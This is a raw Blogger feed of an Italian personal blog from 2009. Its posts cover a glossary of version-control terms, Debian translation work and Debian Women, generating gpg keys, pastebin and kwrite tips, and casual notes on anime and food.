/>Checkout<br />crea una copia funzionante del repository in locale. si può anche richiedere di scaricare una revisione specifica.<br /><br />Commit<br />Una commissione è quando vengono finiti i cambiamenti che si vogliono fare e viene fusa con la versione attuale<br /><br />Conflict<br />un conflitto accade quando vengono fornite due copie differenti da più utenti di un singolo documento. a quel punto un utente dovrà intervenire per decidere quale revisione mantenere e quale scartare o decidere di tenere parte di una e parte dell altra<br /><br />Dynamic stream<br />un posto che contiene alcune o tutte le versioni dei file che sono la copia di un repository principale<br /><br />Export<br />è simile al check out ma crea una directory pulita e non copia i dati dei controlli di revisione. solitamente si fa prima di pubblicare i contenuti.<br /><br />Head<br />la commissione più recente.<br /><br />Import<br />è l'azione di copiare per la prima volta una directory in locale nel repository che ancora non la possiede<br /><br />Label<br />guarda il tag<br /><br />Mainline<br />simile a trunk ma può esserci una mainline principale per ogni ramo<br /><br />Merge<br />è un operazione con la quale si integrano due cambienti sono applicati a un file o a più file.<br /><br />Promote<br />L'azione di copiare file da una locazione poco controllata a una più controllata.<br /><br />Repository<br />è dove sono immagazzinati i file correnti e i dati dello storico cambiamenti, spesso su un server.<br /><br />Resolve<br />Un utente che interviene in un conflitto tra differenti cambiamenti a uno stesso documento<br /><br />Reverse integration<br />il processo di integrare diversi rami distaccati in un ramo centrale del sistema.<br /><br />Revision<br />o versione sono qualsiasi cambiamento nella forma.<br /><br />Stream<br />un contenitore di file deramificati che hanno relazioni con altri come contenitori. ogni stream può contenere diversi dati dello stream principale.<br /><br />Tag<br />etichetta si riferisce a un importante stato nel tempo consistente tra più file tutti etichettati nello stesso modo.<br /><br />Trunk(a volte anche chiamata baseline o mainline)<br />L'unica linea di sviluppo che non è un branch<br /><br />Update<br />integra cambiamenti fatti al repository alla copia locale<br /><br />Working copy<br />è la copia locale dei file di una repository, di un periodo specifico o di una qualche revisione. (concettualmente è una sandbox)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-8548359002749597621?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-38084388588020224082009-07-18T16:08:00.000-07:002009-07-20T13:19:55.687-07:00Volete mandare un documento a qualcuno ma i caratteri di msn non vi bastano ?<br />o di skype ?<br />volete sottolineare parti di codice per mostrarlo a più persone le quali possono a loro volta modificarlo e voi potrete vedere facilmente cosa hanno modificato ?<br /><br />Volete condividere una ricetta di cucina su madeinkitchen ma prima volete mostrarla al vostro amico francese che vi da molti utili consigli ?<br /><br />volete mostrare qualkosa più lungo di 140 caratteri su twitter<br /><br />allora usate pastebin !!!<br /><br />Prima di tutto è open source infatti potete scaricare il server da qui http://pastebin.com/pastebin.tar.gz<br />e oltretutto fa dei link molto corti<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/SmTNVJqpOTI/AAAAAAAAANQ/aSR3d891jI0/s1600-h/pastebin+-+collaborative+debugging+tool.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 152px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/SmTNVJqpOTI/AAAAAAAAANQ/aSR3d891jI0/s200/pastebin+-+collaborative+debugging+tool.jpg" alt="" id="BLOGGER_PHOTO_ID_5360635219733461298" border="0" /></a><br />è fatto per collaborare su uno stesso testo<br />che sia codice o una ricetta<br />http://pastebin.com/<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3808438858802022408?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com1tag:blogger.com,1999:blog-2454834713612225354.post-18514804175118187952009-07-18T16:05:00.000-07:002009-07-18T16:08:18.470-07:00usare: http://alioth.debian.org per contribuire allo sviluppo di debian<br />usare: unstable release di debian per contribuire alla segnalazione dei bugs di debian<br />tradurre: http://www.debian.org/doc/developers-reference/index.html<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-1851480417511818795?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-73159305419570837762009-07-18T12:08:00.000-07:002009-07-18T12:14:48.724-07:00<a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmIeQGyQXZI/AAAAAAAAANA/8XxUf3NjzrE/s1600-h/TEXT-IMAGE.com+::+Convert.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 233px; height: 151px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmIeQGyQXZI/AAAAAAAAANA/8XxUf3NjzrE/s200/TEXT-IMAGE.com+::+Convert.jpg" alt="" id="BLOGGER_PHOTO_ID_5359879768572452242" border="0" /></a><a href="http://www.text-image.com/convert/ascii.html"><br />un sito per convertire immagini in testo :)</a><br /><br />davvero molto carino<br /><br /><br /><br /><br /><br /><pre>dddddddddddddddddddddddddddddd<br />ddddddddddmhyyyyyhdddddddddddd<br />dddddmdho:.````````-+ymddddddd<br />ddddmy:`````-://:.````.odddddd<br />dddd:````/ydhmo+ddho:```.hdddd<br />ddd:```:dyh:`m-`s+.yds```.hddd<br />dds```.dm./o`do:h+`oddo```:mdd<br />ddo```/mdysdddd/++++hdm```.mmd<br />ddy```/ddm::/+yhso-`+dh```-mdd<br />ddd-```omds````.```/hh-```oddd<br />dddd.```:hdd+````odh+````:dddd<br />ddddd/````-oh```-h-````.sddddd<br />ddddddh+.``/h```:d```:sddddddd<br />dddddddddysyh```/msyddmddddddd<br />dddddddds/os+```-ssooddddddddd<br />dddddddds````````````mdddddddd<br />dddddddm+://.````:/:-ddddddddd<br />mdddddddddddo```:ddddddddddddd<br />ddddddddddmdo.--.mdddddddddddd<br />ddddddddddddddddmddddddddddddd<br />dddddddddddddddddddddddddddddd<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7315930541957083776?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-20500778844457133662009-07-18T11:59:00.000-07:002009-07-18T12:13:42.910-07:00se volete provare basta aprire questo link <a href="http://whiteboard.debian.net/aliceinwire.wb">http://whiteboard.debian.net/aliceinwire.wb</a> in più tab scrivere su uno e quando aggiornate gli altri tab comparirà quello che avete scritto<br /><br />è pubblico quindi chiunque va a quel link può leggere quello che c'è scritto<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-2050077884445713366?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-17028525956400106292009-07-18T08:38:00.000-07:002009-07-18T10:20:03.267-07:00oggi mi è capitato di discutere su quest'argomento cosi ho cercato un pò in internet ed è saltato fuori che:<br />Con L'introduzione di windows 95, Microsozz ha cominciato a riferirsi alle directory come folders<br /><img style="width: 270px; height: 231px;" alt="http://www.usbman.com/IMAGES/win95_other.gif" src="http://www.usbman.com/IMAGES/win95_other.gif" /><br /><br />visualizzate appunto come cartelle<br />questa visione ormai è stata portata anche su unix ad esempio konqueror utilizza lo stessa sistema e anchesso le chiama folder<br /><br /><img style="width: 317px; height: 252px;" alt="http://www.minihowto.org/filesystem_howto/konqueror_clicked_on_downloads_.jpg" src="http://www.minihowto.org/filesystem_howto/konqueror_clicked_on_downloads_.jpg" /><br /><br />mac osx utilizza il sistema contrario di windows<br /><img style="width: 310px; height: 286px;" alt="http://km.support.apple.com/library/APPLE/APPLECARE_ALLGEOS/HT2549/HT2549_1.jpg" src="http://km.support.apple.com/library/APPLE/APPLECARE_ALLGEOS/HT2549/HT2549_1.jpg" /><br />chiama directory le cartelle che racchiudono altre folder<br /><br />in conclusione penso che siano comunque directory sia che stiano su un interfaccia grafica o meno<br /><br />le folder nel senso proprio possono essere delle cartelle virtuali o degli archivi<br /><br /><a href="http://upload.wikimedia.org/wikipedia/commons/5/55/7-Zip.png"><img style="width: 307px; height: 283px;" alt="File:7-Zip.png" src="http://upload.wikimedia.org/wikipedia/commons/5/55/7-Zip.png" /></a><br /><br />7 zip è uno dei più efficenti ed è completamente open source<br /><br /><br />qua potete trovare la struttura dei file su debian <a href="http://wiki.debian.org/FilesystemHierarchyStandard">http://wiki.debian.org/FilesystemHierarchyStandard</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-1702852595640010629?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-52976095564751764372009-07-17T14:05:00.000-07:002009-07-17T14:13:46.487-07:00partendo dal fatto che oggi ho avuto mal di pancia per metà giornata e non è che abbia fatto molto... a parte stare con dolori di pancia -.-<br />sarà stata la soia aperta da ormai una settimana ??<br />in effetti aveva un odore strano<br /><br />sto continuando a tradurre il wiki di debian anche se forse dovrei velocizzarmi un pò che se vado avanti di sto passo finirò tra un paio di anni...<br /><br />vi consiglio un sito da dove scaricarvi musica :)<br />visto che ora sto ascoltando: prenzlauberg beirut gulag orkestar<br /><br />il sito è www.pillage.com<br /><br />com'è che mi piaciono i gelati alla frutta e il mio frigo sta pieno di gelato alla crema ???<br />manco un cavolo di ghiacciolo !!!<br /><a href="http://www.madeinkitchen.tv/"><img alt="http://www.madeinkitchen.tv/wp-content/uploads/2009/06/gelato.jpg" src="http://www.madeinkitchen.tv/wp-content/uploads/2009/06/gelato.jpg" /></a><br />voglio il frushi<br /><a href="http://www.madeinkitchen.tv"><img alt="http://www.madeinkitchen.tv/wp-content/uploads/2009/06/frushi.jpg" src="http://www.madeinkitchen.tv/wp-content/uploads/2009/06/frushi.jpg" /></a><br />è una delle tante ricette che potete trovare qui <a href="http://www.madeinkitchen.tv">http://www.madeinkitchen.tv</a><br /><br />ho sentito anche mentre andavo in aereo di uno chef che fa il sushi con le caramelle mmm ba preferisco il frushi!!!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5297609556475176437?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com2tag:blogger.com,1999:blog-2454834713612225354.post-84856632109960771862009-07-17T03:02:00.000-07:002009-07-17T03:24:29.677-07:00Una delle cose che mi ha portata ad approcciare Debian piuttosto che innumerevoli altri SO<br />,a parte il fatto che sia creato da tutti noi che lo utilizzano e che è completamente libero e ognuno può contribuire nel proprio piccolo, è la comunità di donne che c'è dietro il "women Debian Project".<br />che gia avevo visto 4 anni fa quando installai per la prima volta debian su una macchina amministrativa a crema.<br />sfortunatamente a quel tempo a casa avevo un modem adsl non compatibile con il sistema linux, avevo provato svariate volte con eciadsl ma senza nessuna conclusione.<br />comunque mi era rimasta impressa la pagina del progetto e il logo<br /><img alt="http://women.debian.org/images/dw.png" src="http://women.debian.org/images/dw.png" /><br />http://women.debian.org/<br /><br />rimanendone molto affascinata<br />finalmente c'era qualcuno che combatteva contro lo stereotipo femminile !!!<br /><br />ultimamente ho deciso che è arrivato il momento di fare il passaggio visto che ormai debian è sotto molti punti di vista una ottima alternativa a OS propietari<br />diventandolo sempre di più perchè ha tanti coders attivi in tutto il mondo che contribuiscono al progetto<br />se volete avere un idea di tutte le persone che contribuiscono potete guardare qui<br />http://www.debian.org/devel/people<br /><br /><br />cosi mi sono riaffacciata anche al progetto debian women :)<br />se siete interessati anche voi al progetto italiano<br />http://women.debian.org/wiki/Italian/FrontPage<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-8485663210996077186?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-62932290222238389532009-07-17T02:55:00.000-07:002009-07-17T03:02:02.208-07:00finalmente è uscito il caldo !!!<br />voglio andare al mareeeeee<br />ho appena preso un biglietto per roma per poi andare in grecia :D<br />spero di farmi tanti bagni!!!<br /><br />sto traducento parti del debian wiki<br />http://wiki.debian.org/it/DebianPackage<br />se trovate errori scrivetemelo o date un mano nel wiki anche voi ^^<br /><br />sto leggendo la guida per il nuovo maintainer che spiega come pacchettizare i programmi per venir installati su debian<br />molto interessante e utile per un approccio a debian più consistente :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6293229022223838953?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-933352328954526682009-07-16T14:08:00.000-07:002009-07-16T14:22:55.890-07:00<a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://static.fsf.org/fsforg/img/fry720.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 366px; height: 203px;" src="http://static.fsf.org/fsforg/img/fry720.jpg" alt="" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><p>Stephen Fry <a href="http://www.gnu.org/fry/">introduce il software libero</a> e ti ricorda un compleanno molto speciale.</p> <p>Tutti i file sono nel formato ogg. <a href="http://www.fsf.org/resources/formats/playogg/how">guarda come vedere il formato ogg</a></p> <h2><a href="http://stallman.org/fry/sf-large.ogv">Download video, highest quality (125mb)</a></h2> <h3>Smaller downloads</h3> <ul><li><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-hq_600px_780kbit.ogv">High Quality (33mb)</a></li><li><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-nq_600px_425kbit.ogv">Medium quality (21mb)</a></li><li><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-lq_300px_190kbit.ogv">Lower Quality (7mb)</a></li><li><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-vlq_192px_56kbit.ogv">Dial up (very low quality, 3mb)</a></li></ul> <h4><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-nq_600px_425kbit_en.ogv">Medium quality, subtitled for the deaf</a></h4> <h3>Get the audio</h3> <p><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-100kbit_vorbis.ogg">Ogg Vorbis, High Quality, Stereo (5mb)</a> or <a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-12kbit_speex.spx">Ogg Speex, Radio Quality, Mono (400kb)</a></p> <h3 id="french">En français</h3> <ul><li><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-hq_600px_780kbit_fr.ogv">De haute qualité (33mb)</a></li><li><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-nq_600px_425kbit_fr.ogv">De qualité moyenne (21mb)</a></li><li><a href="http://stallman.org/fry/Stephen_Fry-Happy_Birthday_GNU-lq_300px_190kbit_fr.ogv">Basse qualité (7mb)</a></li></ul><span style="font-size:130%;"><br /><span style="font-weight: bold;">Sottotitoli in italiano</span></span><br /><a href="http://www.gnu.org/fry/happy-birthday-to-gnu-italian.srt">Italiano</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-93335232895452668?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-33049326963788221542009-07-16T14:03:00.000-07:002009-07-16T14:08:04.863-07:00ciao a tutti<br />ho trovato l editor per media wiki<br />basta usare kwrite e andare su<br />tool--> highlighting --> markup --> mediawiki<br /><br />e verrà colorato il format di media wiki in modo da capirlo meglio<br /><br />veramente molto utile per tradurre parti di wiki<br /><br />il sito che avevo messo ieri per megaupload non andava per nulla bene alla fine<br />cosi ne ho messo un altro che mi piace molto<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3304932696378822154?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-67444579724953902012009-07-15T16:57:00.000-07:002009-07-15T17:37:23.540-07:00mi sono decisa a installare gpg da shell insomma ci ho passato il pomeriggio per ora ho tutto apposto<br /><br />insomma da linea di comando è un pò complesso<br /><br />gpg --gen-key<br /><br />che genera la chiave gpg<br /><br />ora le impostazioni<br />io ho usato quelle standart<br />poi fate<br /><br />gpg --list-keys<br /><br />per vedere se compare e se è creata giusta<br /><br />gpg --fingerprint vostro nome<br /><br />per avere la fingerprint key<br />che è una pgp criptata in maniera ridotta<br />da appiccicare ovunque ma sempre con criterio<br /><br />la mia per esempio è<br />Key fingerprint = 660B 821F A4E1 EA91 9F22 33DA 223A 9E8D A5FD 3B70<br /><br /><br />se non volete sbattervi di fare comandi da shell<br />vi basta installare<br />http://enigmail.mozdev.org<br /><br /><a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://enigmail.mozdev.org/_img/screenshots/mailnews.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 361px; height: 239px;" src="http://enigmail.mozdev.org/_img/screenshots/mailnews.png" alt="" border="0" /></a> un plugin per thunderbird veramente utile e semplice<br /><br />verifica in automatico i gpg delle mail che vi arrivano e ha un ottima gestione delle vostre chiavi<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://enigmail.mozdev.org/_img/screenshots/mailnews-menu.gif"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 204px; height: 215px;" src="http://enigmail.mozdev.org/_img/screenshots/mailnews-menu.gif" alt="" border="0" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6744457972495390201?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-80095077197669045442009-07-15T16:47:00.000-07:002009-07-16T02:24:12.793-07:00ciao a tutti sto andando a dormire e volevo scrivere un paio di post su cose trovate oggi al volo<br /><br />be volevo vedermi un video prima di addormentarmi ma credo finirò di vederlo dopo<br />però ho reinstallato debian e non mi va di scaricare codec vari per leggere divx e xvid e sottotitoli magari finisce che sono poco stabili e che fanno conflitti.<br />ho cancellato anche gnome che come desktop preferisco usare kde.<br />insomma volevo rilassarmi con un video ma megaupload ha il problema che dopo 72 minuti non ti fa più vedere nulla e io ho appena visto 35 minuti di naruto shippuden 104 che mi mancava e ora stavo guardando bleach.<br /><br />http://www.zomganime.com/<br /><br /><br /><br />cmq questa penso sia solo una soluzione momentanea anche se molto efficace appena ho novità a riguardo vi aggiorno :)<br /><br />aggiornamento : il link di ieri non andava molto bene cosi ho messo questo http://www.zomganime.com/ che ogni tanto lo tiro fuori ha davvero dei bei anime e spesso funzionano sui server video utilizzati da loro.<br /><br />ieri alla fine ho visto naruto però mi sono addormentata a metà ma non ho capito se guren poi è morta davvero<br />spero di no era un personaggio simpatico<br />ma in naruto tutti i personaggi cattivi non durano tanto se diventano buoni<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-8009507719766904544?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-90697169606047797672009-07-15T14:05:00.001-07:002009-07-15T14:12:36.957-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.abclinuxu.cz/images/screenshots/6/6/66424-KWrite-1138.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 188px; height: 140px;" src="http://www.abclinuxu.cz/images/screenshots/6/6/66424-KWrite-1138.png" alt="" border="0" /></a><br />qualcuno conosce un buon editor per wiki ?<br />magari open source per debian ?<br /><br />o anche un plugin per kwrite o simili<br /><br /><br />che mi faccia da solo la formattazione!!!<br /><br /><br /><br />grazie grazie :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-9069716960604779767?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0